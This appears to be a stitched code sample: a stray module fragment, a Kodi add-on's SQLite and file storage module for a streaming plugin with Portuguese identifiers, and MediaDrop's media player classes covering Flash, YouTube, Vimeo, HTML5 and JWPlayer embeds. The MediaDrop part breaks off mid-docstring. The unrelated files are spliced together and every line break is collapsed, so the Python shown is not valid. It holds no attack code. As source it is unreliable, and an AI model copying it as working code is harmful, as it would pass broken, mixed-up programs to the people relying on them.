_interpolate(value, params) __all__ = ['interpolate', 'interpolate_service_conf', 'render']
#!/usr/bin/python # -*- coding: utf-8 -*- try: from sqlite3 import dbapi2 as database except: from pysqlite2 import dbapi2 as database import xbmcvfs, os, sys, xbmc __PASTA_TRAKT__ = os.path.join(xbmc.translatePath('special://userdata/addon_data/plugin.video.mrpiracy/trakt/').decode('utf8')) __DB_FILE__ = os.path.join(xbmc.translatePath('special://userdata/addon_data/plugin.video.mrpiracy/').decode('utf8'), 'dadosv1.db') __PROGRESSO_FILE__ = os.path.join(__PASTA_TRAKT__, 'progresso.mrpiracy') __WATCH_FILMES_FILE__ = os.path.join(__PASTA_TRAKT__, 'watch_filmes.mrpiracy') __WATCH_SERIES_FILE__ = os.path.join(__PASTA_TRAKT__, 'watch_series.mrpiracy') __FILMES_FILE__ = os.path.join(__PASTA_TRAKT__, 'filmes.mrpiracy') __SERIES_FILE__ = os.path.join(__PASTA_TRAKT__, 'series.mrpiracy') def isExists(): if not xbmcvfs.exists(__DB_FILE__): createDB() return "DB criada com sucesso!" else: return "DB nao criada" def escrever_ficheiro(ficheiro, conteudo): f = open(ficheiro, mode="w") f.write(conteudo) f.close() def ler_ficheiro(ficheiro): f = open(ficheiro, "r") conteudo = f.read() f.close() return conteudo def criarFicheiros(): try: os.makedirs(__PASTA_TRAKT__) except: pass escrever_ficheiro(__PROGRESSO_FILE__, '') escrever_ficheiro(__WATCH_SERIES_FILE__, '') escrever_ficheiro(__WATCH_FILMES_FILE__, '') escrever_ficheiro(__SERIES_FILE__, '') escrever_ficheiro(__FILMES_FILE__, '') def createDB(): if not xbmcvfs.exists(__DB_FILE__): """f = open(__DB_FILE__, 'w') f.write('') f.close()""" con, dbcursor = connect() dbcursor.execute("CREATE TABLE IF NOT EXISTS trakt (id integer PRIMARY KEY NOT NULL, filmes text, series text, watchlistFilmes text, watchlistSeries text, progresso text, horas text);") """ dbcursor.execute("CREATE TABLE IF NOT EXISTS episodios (id integer PRIMARY KEY NOT NULL,nome text,plot text,categoria text,actores text,temporada text,episodio text,visto text DEFAULT('nao'),fanart text,poster text,imdb text,tvdb text,aired text,serienome text,traktid text);") dbcursor.execute("CREATE TABLE IF NOT EXISTS filmes (id integer PRIMARY KEY NOT NULL,imdb text,nome text,plot text,actores text,categoria text,visto text DEFAULT('nao'),fanart text,poster text,trailer text,ano text,traktid text,slug text);") dbcursor.execute("CREATE TABLE IF NOT EXISTS series (id integer PRIMARY KEY NOT NULL,nome text,plot text,imdb text,tvdb text,actores text,categoria text,visto text DEFAULT('nao'),fanart text,poster text,aired text,ano text,traktid text,slug text);") dbcursor.execute("CREATE TABLE IF NOT EXISTS temporadas (id integer PRIMARY KEY NOT NULL,imdb text,tvdb text,fanart text,temporada text,poster text);")""" con.commit() def connect(): conn = database.connect(__DB_FILE__) cursor = conn.cursor() conn.text_factory = str return conn, cursor def close(conn): conn.close() def insertTraktDB(filmes, series, watchlistFilmes, watchlistSeries, progresso, data): escrever_ficheiro(__PROGRESSO_FILE__, progresso) escrever_ficheiro(__WATCH_SERIES_FILE__, watchlistSeries) escrever_ficheiro(__WATCH_FILMES_FILE__, watchlistFilmes) escrever_ficheiro(__FILMES_FILE__, filmes) escrever_ficheiro(__SERIES_FILE__, series) def selectProgresso(): return ler_ficheiro(__PROGRESSO_FILE__) def selectWatchFilmes(): return ler_ficheiro(__WATCH_FILMES_FILE__) def selectWatchSeries(): return ler_ficheiro(__WATCH_SERIES_FILE__) def selectFilmes(): return ler_ficheiro(__FILMES_FILE__) def selectSeries(): return ler_ficheiro(__SERIES_FILE__) def insertTraktDB2(filmes, series, watchlistFilmes, watchlistSeries, progresso, data): con, dbcursor = connect() dbcursor.execute("INSERT OR REPLACE INTO trakt (id, filmes, series, watchlistFilmes, watchlistSeries, progresso, horas) VALUES (?, ?, ?, ?, ?, ?, ?)", (1, filmes, series, watchlistFilmes, watchlistSeries, progresso, data)) con.commit() def selectTraktDB(): con, dbcursor = connect() dbcursor.execute("SELECT * FROM trakt WHERE id=1") return dbcursor.fetchone() def insertFilmeDB(nome, plot, imdb, poster, fanart, trailer, ano, traktid, slug, categoria=None, actores=None): if categoria == None: categoria = '' if actores == None: actores = '' con, dbcursor = connect() dbcursor.execute("INSERT INTO filmes(imdb, nome, plot, categoria, actores, fanart, poster, trailer, ano, traktid, slug) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (imdb, nome, plot, categoria, actores, fanart, poster, trailer, ano, traktid, slug)) con.commit() def selectFilmeDB(imdb): con, dbcursor = connect() dbcursor.execute("SELECT imdb, nome, plot, categoria, actores, fanart, poster, trailer, ano, visto, traktid, slug FROM filmes WHERE imdb=?", (imdb,)) return dbcursor.fetchone() def markwatchedFilmeDB(imdb, naoVisto=None): conn, dbcursor = connect() dbcursor.execute("SELECT visto FROM filmes WHERE imdb=?", (imdb,)) visto = dbcursor.fetchone() if visto[0] == "nao": dbcursor.execute("UPDATE filmes SET visto=? WHERE imdb=?", ("sim", imdb)) conn.commit() return True elif visto[0] == "sim": if naoVisto: dbcursor.execute("UPDATE filmes SET visto=? WHERE imdb=?", ("nao", imdb)) conn.commit() return True return False def isWatchedFilmeDB(imdb): conn, dbcursor = connect() dbcursor.execute("SELECT visto FROM filmes WHERE imdb=?", (imdb,)) visto = dbcursor.fetchone() if visto[0] == "nao": return False elif visto[0] == "sim": return True def insertSerie(nome, plot, imdb, tvdb, poster, fanart, aired, ano, traktid, slug, categoria=None, actores=None): if categoria == None: categoria = '' if actores == None: actores = '' con, dbcursor = connect() dbcursor.execute("INSERT INTO series(nome, plot, imdb, tvdb, actores, categoria, fanart, poster, aired, ano, traktid, slug) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (nome, plot, imdb, tvdb, actores, categoria, fanart, poster, aired, ano, traktid, slug)) con.commit() def selectSerieDB(imdb): con, dbcursor = connect() dbcursor.execute("SELECT nome, plot, imdb, tvdb, actores, categoria, fanart, poster, aired, ano, traktid, slug FROM series WHERE imdb=?", (imdb,)) return dbcursor.fetchone() def getTVDBSerie(imdb): con, dbcursor = connect() dbcursor.execute("SELECT tvdb FROM series WHERE imdb=?", (imdb,)) return dbcursor.fetchone() def insertEpisodio(nome, plot, imdb, tvdb, temporada, episodio, fanart, poster, aired, serienome, traktid, categoria=None, actores=None): if categoria == None: categoria = '' if actores == None: actores = '' con, dbcursor = connect() dbcursor.execute("INSERT INTO episodios(nome, plot, temporada, episodio, fanart, poster, imdb, tvdb, aired, actores, categoria, serienome, traktid) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (nome, plot, temporada, episodio, fanart, poster, imdb, tvdb, aired, actores, categoria, serienome, traktid)) con.commit() def selectEpisodioDB(imdb, temporada, episodio): con, dbcursor = connect() dbcursor.execute("SELECT nome, plot, temporada, episodio, fanart, poster, aired, actores, categoria, visto, imdb, serienome, traktid FROM episodios WHERE imdb=? AND temporada=? AND episodio=?", (imdb, temporada, episodio)) return dbcursor.fetchone() def selectTVDBEpisodioDB(imdb, temporada, episodio): conn, dbcursor = connect() dbcursor.execute("SELECT tvdb FROM episodios WHERE imdb=? AND temporada=? AND episodio=?", (imdb, temporada, episodio)) return dbcursor.fetchone() def markwatchedEpisodioDB(imdb, temporada, episodio, naoVisto=None): conn, dbcursor = connect() dbcursor.execute("SELECT visto FROM episodios WHERE imdb=? AND temporada=? AND episodio=?", (imdb, temporada, episodio)) visto = dbcursor.fetchone() if visto[0] == "nao": dbcursor.execute("UPDATE episodios SET visto=? WHERE imdb=? AND temporada=? AND episodio=?", ("sim", imdb, temporada, episodio)) conn.commit() return True elif visto[0] == "sim": if naoVisto: dbcursor.execute("UPDATE episodios SET visto=? WHERE imdb=? AND temporada=? AND episodio=?", ("nao", imdb, temporada, episodio)) conn.commit() return True return False def isWatchedSerieDB(imdb, temporada, episodio): conn, dbcursor = connect() dbcursor.execute("SELECT visto FROM episodios WHERE imdb=? AND temporada=? AND episodio=?", (imdb, temporada, episodio)) visto = dbcursor.fetchone() if visto[0] == "nao": return False elif visto[0] == "sim": return True def updateEpisodioDB(nome, plot, imdb, tvdb, temporada, episodio, fanart, poster, aired, serienome, traktid, categoria=None, actores=None): conn, dbcursor = connect() if categoria == None: categoria = '' if actores == None: actores = '' dbcursor.execute("DELETE FROM episodios WHERE imdb=? AND temporada=? AND episodio is NULL", (imdb, temporada)) #dbcursor.execute("UPDATE episodios SET nome=?, plot=?, tvdb=?, episodio=?, fanart=?, poster=?, aired=?, serienome=?, traktid=?, categoria=?, actores=? WHERE imdb=? AND temporada=?", (nome, plot, tvdb, episodio, fanart, poster, aired, serienome, traktid, categoria, actores, imdb, temporada)") conn.commit() insertEpisodio(nome, plot, imdb, tvdb, temporada, episodio, fanart, poster, aired, serienome, traktid, categoria, actores)
# This file is a part of MediaDrop (http://www.mediadrop.net), # Copyright 2009-2014 MediaDrop contributors # For the exact contribution history, see the git revision log. # The source code contained in this file is licensed under the GPLv3 or # (at your option) any later version. # See LICENSE.txt in the main project directory, for more information. from datetime import datetime from itertools import izip import logging from urllib import urlencode from genshi.builder import Element from genshi.core import Markup import simplejson from sqlalchemy import sql from mediadrop.forms.admin import players as player_forms from mediadrop.lib.compat import any from mediadrop.lib.filetypes import AUDIO, VIDEO, AUDIO_DESC, CAPTIONS from mediadrop.lib.i18n import N_ from mediadrop.lib.templating import render from mediadrop.lib.thumbnails import thumb_url from mediadrop.lib.uri import pick_uris from mediadrop.lib.util import url_for #from mediadrop.model.players import fetch_players XXX: Import at EOF from mediadrop.plugin.abc import AbstractClass, abstractmethod, abstractproperty log = logging.getLogger(__name__) HTTP, RTMP = 'http', 'rtmp' ############################################################################### class AbstractPlayer(AbstractClass): """ Player Base Class that all players must implement. """ name = abstractproperty() """A unicode string identifier for this class.""" display_name = abstractproperty() """A unicode display name for the class, to be used in the settings UI.""" settings_form_class = None """An optional :class:`mediadrop.forms.admin.players.PlayerPrefsForm`.""" default_data = {} """An optional default data dictionary for user preferences.""" supports_resizing = True """A flag that allows us to mark the few players that can't be resized. Setting this to False ensures that the resize (expand/shrink) controls will not be shown in our player control bar. """ @abstractmethod def can_play(cls, uris): """Test all the given URIs to see if they can be played by this player. This is a class method, not an instance or static method. :type uris: list :param uris: A collection of StorageURI tuples to test. :rtype: tuple :returns: Boolean result for each of the given URIs. """ def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ return error_text or u'' @abstractmethod def render_js_player(self): """Render a javascript string to instantiate a javascript player. Each player has a client-side component to provide a consistent way of initializing and interacting with the player. For more information see :file:`mediadrop/public/scripts/mcore/players/`. :rtype: ``unicode`` :returns: A javascript string which will evaluate to an instance of a JS player class. For example: ``new mcore.Html5Player()``. """ def __init__(self, media, uris, data=None, width=None, height=None, autoplay=False, autobuffer=False, qualified=False, **kwargs): """Initialize the player with the media that it will be playing. :type media: :class:`mediadrop.model.media.Media` instance :param media: The media object that will be rendered. :type uris: list :param uris: The StorageURIs this player has said it :meth:`can_play`. :type data: dict or None :param data: Optional player preferences from the database. :type elem_id: unicode, None, Default :param elem_id: The element ID to use when rendering. If left undefined, a sane default value is provided. Use None to disable. """ self.media = media self.uris = uris self.data = data or {} self.width = width or 400 self.height = height or 225 self.autoplay = autoplay self.autobuffer = autobuffer self.qualified = qualified self.elem_id = kwargs.pop('elem_id', '%s-player' % media.slug) _width_diff = 0 _height_diff = 0 @property def adjusted_width(self): """Return the desired viewable width + any extra for the player.""" return self.width + self._width_diff @property def adjusted_height(self): """Return the desired viewable height + the height of the controls.""" return self.height + self._height_diff def get_uris(self, **kwargs): """Return a subset of the :attr:`uris` for this player. This allows for easy filtering of URIs by feeding any number of kwargs to this function. See :func:`mediadrop.lib.uri.pick_uris`. """ return pick_uris(self.uris, **kwargs) @classmethod def inject_in_db(cls, enable_player=False): from mediadrop.model import DBSession from mediadrop.model.players import players as players_table, PlayerPrefs prefs = PlayerPrefs() prefs.name = cls.name prefs.enabled = enable_player # MySQL does not allow referencing the same table in a subquery # (i.e. insert, max): http://stackoverflow.com/a/14302701/138526 # Therefore we need to alias the table in max current_max_query = sql.select([sql.func.max(players_table.alias().c.priority)]) # sql.func.coalesce == "set default value if func.max does " # In case there are no players in the database the current max is NULL. With # coalesce we can set a default value. new_priority_query = sql.func.coalesce( current_max_query.as_scalar()+1, 1 ) prefs.priority = new_priority_query prefs.created_on = datetime.now() prefs.modified_on = datetime.now() prefs.data = cls.default_data DBSession.add(prefs) DBSession.commit() ############################################################################### class FileSupportMixin(object): """ Mixin that provides a can_play test on a number of common parameters. """ supported_containers = abstractproperty() supported_schemes = set([HTTP]) supported_types = set([AUDIO, VIDEO]) @classmethod def can_play(cls, uris): """Test all the given URIs to see if they can be played by this player. This is a class method, not an instance or static method. :type uris: list :param uris: A collection of StorageURI tuples to test. :rtype: tuple :returns: Boolean result for each of the given URIs. """ return tuple(uri.file.container in cls.supported_containers and uri.scheme in cls.supported_schemes and uri.file.type in cls.supported_types for uri in uris) class FlashRenderMixin(object): """ Mixin for rendering flash players. Used by embedtypes as well as flash. """ def render_object_embed(self, error_text=None): object_tag = self.render_object() orig_id = self.elem_id self.elem_id = None embed_tag = self.render_embed(error_text) self.elem_id = orig_id return object_tag(embed_tag) def render_embed(self, error_text=None): swf_url = self.swf_url() flashvars = urlencode(self.flashvars()) tag = Element('embed', type='application/x-shockwave-flash', allowfullscreen='true', allowscriptaccess='always', width=self.adjusted_width, height=self.adjusted_height, src=swf_url, flashvars=flashvars, id=self.elem_id) if error_text: tag(error_text) return tag def render_object(self, error_text=None): swf_url = self.swf_url() flashvars = urlencode(self.flashvars()) tag = Element('object', type='application/x-shockwave-flash', width=self.adjusted_width, height=self.adjusted_height, data=swf_url, id=self.elem_id) tag(Element('param', name='movie', value=swf_url)) tag(Element('param', name='flashvars', value=flashvars)) tag(Element('param', name='allowfullscreen', value='true')) tag(Element('param', name='allowscriptaccess', value='always')) if error_text: tag(error_text) return tag def render_js_player(self): """Render a javascript string to instantiate a javascript player. Each player has a client-side component to provide a consistent way of initializing and interacting with the player. For more information see ``mediadrop/public/scripts/mcore/players/``. :rtype: ``unicode`` :returns: A javascript string which will evaluate to an instance of a JS player class. For example: ``new mcore.Html5Player()``. """ return Markup("new mcore.FlashPlayer('%s', %d, %d, %s)" % ( self.swf_url(), self.adjusted_width, self.adjusted_height, simplejson.dumps(self.flashvars()), )) ############################################################################### class AbstractFlashPlayer(FileSupportMixin, FlashRenderMixin, AbstractPlayer): """ Base Class for standard Flash Players. This does not typically include flash players from other vendors such as embed types. """ supported_containers = set(['mp3', 'mp4', 'flv', 'f4v', 'flac']) @abstractmethod def flashvars(self): """Return a python dict of flashvars for this player.""" @abstractmethod def swf_url(self): """Return the flash player URL.""" class AbstractRTMPFlashPlayer(AbstractFlashPlayer): """ Dummy Base Class for Flash Players that can stream over RTMP. """ supported_schemes = set([HTTP, RTMP]) class FlowPlayer(AbstractFlashPlayer): """ FlowPlayer (Flash) """ name = u'flowplayer' """A unicode string identifier for this class.""" display_name = N_(u'Flowplayer') """A unicode display name for the class, to be used in the settings UI.""" supported_schemes = set([HTTP]) def swf_url(self): """Return the flash player URL.""" return url_for('/scripts/third-party/flowplayer/flowplayer-3.2.14.swf', qualified=self.qualified) def flashvars(self): """Return a python dict of flashvars for this player.""" http_uri = self.uris[0] playlist = [] vars = { 'canvas': {'backgroundColor': '#000', 'backgroundGradient': 'none'}, 'plugins': { 'controls': {'autoHide': True}, }, 'clip': {'scaling': 'fit'}, 'playlist': playlist, } # Show a preview image if self.media.type == AUDIO or not self.autoplay: playlist.append({ 'url': thumb_url(self.media, 'l', qualified=self.qualified), 'autoPlay': True, 'autoBuffer': True, }) playlist.append({ 'url': str(http_uri), 'autoPlay': self.autoplay, 'autoBuffer': self.autoplay or self.autobuffer, }) # Flowplayer wants these options passed as an escaped JSON string # inside a single 'config' flashvar. When using the flowplayer's # own JS, this is automatically done, but since we use Swiff, a # SWFObject clone, we have to do this ourselves. vars = {'config': simplejson.dumps(vars, separators=(',', ':'))} return vars AbstractFlashPlayer.register(FlowPlayer) ############################################################################### class AbstractEmbedPlayer(AbstractPlayer): """ Abstract Embed Player for third-party services like YouTube Typically embed players will play only their own content, and that is the only way such content can be played. Therefore each embed type has been given its own :attr:`~mediadrop.lib.uri.StorageURI.scheme` which uniquely identifies it. For example, :meth:`mediadrop.lib.storage.YoutubeStorage.get_uris` returns URIs with a scheme of `'youtube'`, and the special :class:`YoutubePlayer` would overload :attr:`scheme` to also be `'youtube'`. This would allow the Youtube player to play only those URIs. """ scheme = abstractproperty() """The `StorageURI.scheme` which uniquely identifies this embed type.""" @classmethod def can_play(cls, uris): """Test all the given URIs to see if they can be played by this player. This is a class method, not an instance or static method. :type uris: list :param uris: A collection of StorageURI tuples to test. :rtype: tuple :returns: Boolean result for each of the given URIs. """ return tuple(uri.scheme == cls.scheme for uri in uris) class AbstractIframeEmbedPlayer(AbstractEmbedPlayer): """ Abstract Embed Player for services that provide an iframe player. """ def render_js_player(self): """Render a javascript string to instantiate a javascript player. Each player has a client-side component to provide a consistent way of initializing and interacting with the player. For more information see ``mediadrop/public/scripts/mcore/players/``. :rtype: ``unicode`` :returns: A javascript string which will evaluate to an instance of a JS player class. For example: ``new mcore.Html5Player()``. """ return Markup("new mcore.IframePlayer()") class AbstractFlashEmbedPlayer(FlashRenderMixin, AbstractEmbedPlayer): """ Simple Abstract Flash Embed Player Provides sane defaults for most flash-based embed players from third-party vendors, which typically never need any flashvars or special configuration. """ def swf_url(self): """Return the flash player URL.""" return str(self.uris[0]) def flashvars(self): """Return a python dict of flashvars for this player.""" return {} class VimeoUniversalEmbedPlayer(AbstractIframeEmbedPlayer): """ Vimeo Universal Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.VimeoStorage`. This player has seamless HTML5 and Flash support. """ name = u'vimeo' """A unicode string identifier for this class.""" display_name = N_(u'Vimeo') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'vimeo' """The `StorageURI.scheme` which uniquely identifies this embed type.""" def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ uri = self.uris[0] tag = Element('iframe', src=uri, frameborder=0, width=self.adjusted_width, height=self.adjusted_height) return tag AbstractIframeEmbedPlayer.register(VimeoUniversalEmbedPlayer) class DailyMotionEmbedPlayer(AbstractIframeEmbedPlayer): """ Daily Motion Universal Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.DailyMotionStorage`. This player has seamless HTML5 and Flash support. """ name = u'dailymotion' """A unicode string identifier for this class.""" display_name = N_(u'Daily Motion') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'dailymotion' """The `StorageURI.scheme` which uniquely identifies this embed type.""" def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ uri = self.uris[0] data = urlencode({ 'width': 560, # XXX: The native height for this width is 420 'theme': 'none', 'iframe': 1, 'autoPlay': 0, 'hideInfos': 1, 'additionalInfos': 1, 'foreground': '#F7FFFD', 'highlight': '#FFC300', 'background': '#171D1B', }) tag = Element('iframe', src='%s?%s' % (uri, data), frameborder=0, width=self.adjusted_width, height=self.adjusted_height) if error_text: tag(error_text) return tag AbstractIframeEmbedPlayer.register(DailyMotionEmbedPlayer) class YoutubePlayer(AbstractIframeEmbedPlayer): """ YouTube Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.YoutubeStorage`. """ name = u'youtube' """A unicode string identifier for this class.""" display_name = N_(u'YouTube') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'youtube' """The `StorageURI.scheme` which uniquely identifies this embed type.""" settings_form_class = player_forms.YoutubePlayerPrefsForm """An optional :class:`mediadrop.forms.admin.players.PlayerPrefsForm`.""" default_data = { 'version': 3, 'disablekb': 0, 'autohide': 2, 'autoplay': 0, 'iv_load_policy': 1, 'modestbranding': 1, 'fs': 1, 'hd': 0, 'showinfo': 0, 'rel': 0, 'showsearch': 0, 'wmode': 0, } _height_diff = 25 def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ uri = self.uris[0] data = self.data.copy() wmode = data.pop('wmode', 0) if wmode: # 'wmode' is subject to a lot of myths and half-true statements, # these are the best resources I could find: # http://stackoverflow.com/questions/886864/differences-between-using-wmode-transparent-opaque-or-window-for-an-embed # http://kb2.adobe.com/cps/127/tn_12701.html#main_Using_Window_Mode__wmode__values_ data['wmode'] = 'opaque' data_qs = urlencode(data) iframe_attrs = dict( frameborder=0, width=self.adjusted_width, height=self.adjusted_height, ) if bool(data.get('fs')): iframe_attrs.update(dict( allowfullscreen='', # non-standard attributes, required to enable YouTube's HTML5 # full-screen capabilities mozallowfullscreen='', webkitallowfullscreen='', )) tag = Element('iframe', src='%s?%s' % (uri, data_qs), **iframe_attrs) if error_text: tag(error_text) return tag AbstractIframeEmbedPlayer.register(YoutubePlayer) class GoogleVideoFlashPlayer(AbstractFlashEmbedPlayer): """ Google Video Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.GoogleVideoStorage`. """ name = u'googlevideo' """A unicode string identifier for this class.""" display_name = N_(u'Google Video') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'googlevideo' """The `StorageURI.scheme` which uniquely identifies this embed type.""" _height_diff = 27 AbstractFlashEmbedPlayer.register(GoogleVideoFlashPlayer) class BlipTVFlashPlayer(AbstractFlashEmbedPlayer): """ BlipTV Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.BlipTVStorage`. """ name = u'bliptv' """A unicode string identifier for this class.""" display_name = N_(u'BlipTV') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'bliptv' """The `StorageURI.scheme` which uniquely identifies this embed type.""" AbstractFlashEmbedPlayer.register(BlipTVFlashPlayer) ############################################################################### class AbstractHTML5Player(FileSupportMixin, AbstractPlayer): """ HTML5 <audio> / <video> tag. References: - http://dev.w3.org/html5/spec/Overview.html#audio - http://dev.w3.org/html5/spec/Overview.html#video - http://developer.apple.com/safari/library/documentation/AudioVideo/Conceptual/Using_HTML5_Audio_Video/Introduction/Introduction.html """ supported_containers = set(['mp3', 'mp4', 'ogg', 'webm', 'm3u8']) supported_schemes = set([HTTP]) def __init__(self, *args, **kwargs): super(AbstractHTML5Player, self).__init__(*args, **kwargs) # Move mp4 files to the front of the list because the iPad has # a bug that prevents it from playing but the first file. self.uris.sort(key=lambda uri: uri.file.container != 'mp4') self.uris.sort(key=lambda uri: uri.file.container != 'm3u8') def html5_attrs(self): attrs = { 'id': self.elem_id, 'controls': 'controls', 'width': self.adjusted_width, 'height': self.adjusted_height, } if self.autoplay: attrs['autoplay'] = 'autoplay' elif self.autobuffer: # This isn't included in the HTML5 spec, but Safari supports it attrs['autobuffer'] = 'autobuffer' if self.media.type == VIDEO: attrs['poster'] = thumb_url(self.media, 'l', qualified=self.qualified) return attrs def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ attrs = self.html5_attrs() tag = Element(self.media.type, **attrs) for uri in self.uris: # Providing a type attr breaks for m3u8 breaks iPhone playback. # Tried: application/x-mpegURL, vnd.apple.mpegURL, video/MP2T if uri.file.container == 'm3u8': mimetype = None else: mimetype = uri.file.mimetype tag(Element('source', src=uri, type=mimetype)) if error_text: tag(error_text) return tag def render_js_player(self): return Markup("new mcore.Html5Player()") class HTML5Player(AbstractHTML5Player): """ HTML5 Player Implementation. Seperated from :class:`AbstractHTML5Player` to make it easier to subclass and provide a custom HTML5 player. """ name = u'html5' """A unicode string identifier for this class.""" display_name = N_(u'Plain HTML5 Player') """A unicode display name for the class, to be used in the settings UI.""" AbstractHTML5Player.register(HTML5Player) ############################################################################### class HTML5PlusFlowPlayer(AbstractHTML5Player): """ HTML5 Player with fallback to FlowPlayer. """ name = u'html5+flowplayer' """A unicode string identifier for this class.""" display_name = N_(u'HTML5 + Flowplayer Fallback') """A unicode display name for the class, to be used in the settings UI.""" settings_form_class = player_forms.HTML5OrFlashPrefsForm """An optional :class:`mediadrop.forms.admin.players.PlayerPrefsForm`.""" default_data = {'prefer_flash': False} """An optional default data dictionary for user preferences.""" supported_containers = HTML5Player.supported_containers \ | FlowPlayer.supported_containers supported_schemes = HTML5Player.supported_schemes \ | FlowPlayer.supported_schemes def __init__(self, media, uris, **kwargs): super(HTML5PlusFlowPlayer, self).__init__(media, uris, **kwargs) self.flowplayer = None self.prefer_flash = self.data.get('prefer_flash', False) self.uris = [u for u, p in izip(uris, AbstractHTML5Player.can_play(uris)) if p] flow_uris = [u for u, p in izip(uris, FlowPlayer.can_play(uris)) if p] if flow_uris: self.flowplayer = FlowPlayer(media, flow_uris, **kwargs) def render_js_player(self): flash = self.flowplayer and self.flowplayer.render_js_player() html5 = self.uris and super(HTML5PlusFlowPlayer, self).render_js_player() if html5 and flash: return Markup("new mcore.MultiPlayer([%s, %s])" % \ (self.prefer_flash and (flash, html5) or (html5, flash))) if html5 or flash: return html5 or flash return None def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ if self.uris: return super(HTML5PlusFlowPlayer, self).render_markup(error_text) return error_text or u'' AbstractHTML5Player.register(HTML5PlusFlowPlayer) ############################################################################### class JWPlayer(AbstractHTML5Player): """ JWPlayer (Flash) """ name = u'jwplayer' """A unicode string identifier for this class.""" display_name = N_(u'JWPlayer') """A unicode display name for the class, to be used in the settings UI.""" supported_containers = AbstractHTML5Player.supported_containers \ | AbstractRTMPFlashPlayer.supported_containers \ | set(['xml', 'srt']) # supported_containers.add('youtube') supported_types = set([AUDIO, VIDEO, AUDIO_DESC, CAPTIONS]) supported_schemes = set([HTTP, RTMP]) # Height adjustment in pixels to accomodate the control bar and stay 16:9 _height_diff = 24 providers = { AUDIO: 'sound', VIDEO: 'video', } def __init__(self, media, uris, **kwargs): html5_uris = [uri for uri, p in izip(uris, AbstractHTML5Player.can_play(uris)) if p] flash_uris = [uri for uri, p in izip(uris, AbstractRTMPFlashPlayer.can_play(uris)) if p] super(JWPlayer, self).__init__(media, html5_uris, **kwargs) self.all_uris = uris self.flash_uris = flash_uris self.rtmp_uris = pick_uris(flash_uris, scheme=RTMP) def swf_url(self): return url_for('/scripts/third-party/jw_player/player.swf', qualified=self.qualified) def js_url(self): return url_for('/scripts/third-party/jw_player/jwplayer.min.js', qualified=self.qualified) def player_vars(self): """Return a python dict of vars for this player.""" vars = { 'autostart': self.autoplay, 'height': self.adjusted_height, 'width': self.adjusted_width, 'controlbar': 'bottom', 'players': [ # XXX: Currently flash *must* come first for the RTMP/HTTP logic. {'type': 'flash', 'src': self.swf_url()}, {'type': 'html5'}, {'type': 'download'}, ], } playlist = self.playlist() plugins = self.plugins() if playlist: vars['playlist'] = playlist if plugins: vars['plugins'] = plugins # Playlists have 'image's and <video> elements have provide 'poster's, # but <audio> elements have no 'poster' attribute. Set an image via JS: if self.media.type == AUDIO and not playlist: vars['image'] = thumb_url(self.media, 'l', qualified=self.qualified) return vars def playlist(self): if self.uris: return None if self.rtmp_uris: return self.rtmp_playlist() uri = self.flash_uris[0] return [{ 'image': thumb_url(self.media, 'l', qualified=self.qualified), 'file': str(uri), 'duration': self.media.duration, 'provider': self.providers[uri.file.type], }] def rtmp_playlist(self): levels = [] item = {'streamer': self.rtmp_uris[0].server_uri, 'provider': 'rtmp', 'levels': levels, 'duration': self.media.duration} # If no HTML5 uris exist, no <video> tag will be output, so we have to # say which thumb image to use. Otherwise it's unnecessary bytes. if not self.uris: item['image'] = thumb_url(self.media, 'l', qualified=self.qualified) for uri in self.rtmp_uris: levels.append({ 'file': uri.file_uri, 'bitrate': uri.file.bitrate, 'width': uri.file.width, }) playlist = [item] return playlist def plugins(self): plugins = {} audio_desc = pick_uris(self.all_uris, type=AUDIO_DESC) captions = pick_uris(self.all_uris, type=CAPTIONS) if audio_desc: plugins['audiodescription'] = {'file': str(audio_desc[0])} if captions: plugins['captions'] = {'file': str(captions[0])} return plugins def flash_override_playlist(self): # Use this hook only when HTML5 and RTMP uris exist. if self.uris and self.rtmp_uris: return self.rtmp_playlist() def render_js_player(self): vars = simplejson.dumps(self.player_vars()) flash_playlist = simplejson.dumps(self.flash_override_playlist()) return Markup("new mcore.JWPlayer(%s, %s)" % (vars, flash_playlist)) def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ if self.uris: html5_tag = super(JWPlayer, self).render_markup(error_text) else: html5_tag = '' script_tag = Markup( '<script type="text/javascript" src="%s"></script>' % self.js_url()) return html5_tag + script_tag AbstractHTML5Player.register(JWPlayer) ############################################################################### class SublimePlayer(AbstractHTML5Player): """ Sublime Video Player with a builtin flash fallback """ name = u'sublime' """A unicode string identifier for this class.""" display_name = N_(u'Sublime Video Player') """A unicode display name for the class, to be used in the settings 